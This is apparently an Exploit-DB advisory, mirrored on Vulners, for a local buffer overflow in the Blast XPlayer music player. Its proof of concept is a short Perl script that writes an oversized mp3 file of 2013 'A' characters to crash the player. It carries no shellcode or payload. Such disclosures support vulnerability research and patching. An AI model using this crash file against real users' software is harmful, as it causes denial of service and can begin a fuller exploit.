Lucene search
K

Blast XPlayer - Local Buffer Overflow (PoC)

🗓️ 26 Sep 2013 00:00:00Reported by flux77Type 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 23 Views

Blast XPlayer Local Buffer Overflow PoC from Sourceforg

Code
Title: Blast XPlayer Local Buffer Overflow PoC
Vendor: http://sourceforge.net/projects/blast-player/files/latest/download?source=dlp
Versions: Beta
Platform: nix*, windows
Bug: Buffer Overflow


-------------------------------------------------------
 
1) Introduction
2) Proof of concept
3) Credits
 
 
===========
1) Introduction
===========
 
This application is a music player application is very practical and simple. 
Easy to use and the capacity that is not too big only 5MB. 
with this application you can play music whenever you want to store in flashdisc 
and opened on the computer without having to install it first. 
This application is still in the Indonesian version, but will be present in the english version in a few days.
 
=====
2)proof of concept
=====
 
#!/usr/bin/perl

$bof = "A" x 2013;
$filename = "bof.mp3";
open (FILE,">$filename");
print FILE "$bof";
print "\ncreated!!!\n";

=====
3)Credits
=====
 
flux77
Contact : 0xflux77 at gmail.com

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation